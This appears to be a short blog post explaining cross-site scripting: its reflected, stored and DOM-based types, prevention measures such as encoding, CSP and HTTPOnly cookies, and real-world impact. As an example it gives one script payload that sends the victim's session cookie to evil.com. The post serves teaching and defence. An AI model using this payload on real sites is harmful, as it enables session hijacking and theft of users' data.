Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious scripts into webpages viewed by other users. These scripts run in the victim’s browser and can steal data, hijack sessions, or deface websites.
🕷️ What Is XSS?
XSS is a client-side code injection attack where malicious JavaScript is embedded into a trusted website. When unsuspecting users visit the site, the script executes in their browser as if it came from the site itself.
Example:
<script>document.location='http://evil.com?cookie='+document.cookie</script>
This script steals the user's session cookie and sends it to an attacker-controlled domain.
⚠️ Types of XSS Attacks
Reflected XSS
- Injected via URL or form input.
- Payload is reflected in the response.
- Common in search forms or login pages.
Stored XSS
- Malicious script is stored in the database (e.g., in comments or user profiles).
- Every visitor to the page executes the script.
DOM-based XSS
- Manipulates the DOM environment in the browser.
- Doesn’t rely on server-side injection; occurs entirely on the client side.
Sources:
🔐 How to Prevent XSS
- Input Sanitization: Strip or escape dangerous characters (
<,>,',",/, etc.). - Output Encoding: Encode data before rendering it in HTML, JavaScript, or URLs.
- Content Security Policy (CSP): Restrict sources of executable scripts.
- Use Secure Frameworks: Libraries like React or Angular automatically escape output.
- HTTPOnly Cookies: Prevent JavaScript from accessing session cookies.
🧠 Real-World Impact
XSS vulnerabilities have affected major platforms like Facebook, Twitter, and eBay. Attackers have used them to:
- Steal credentials
- Spread worms
- Redirect users to phishing sites
If you're building microservices or REST APIs with Spring Boot, I can show you how to sanitize inputs and configure security headers to mitigate XSS.
No comments:
Post a Comment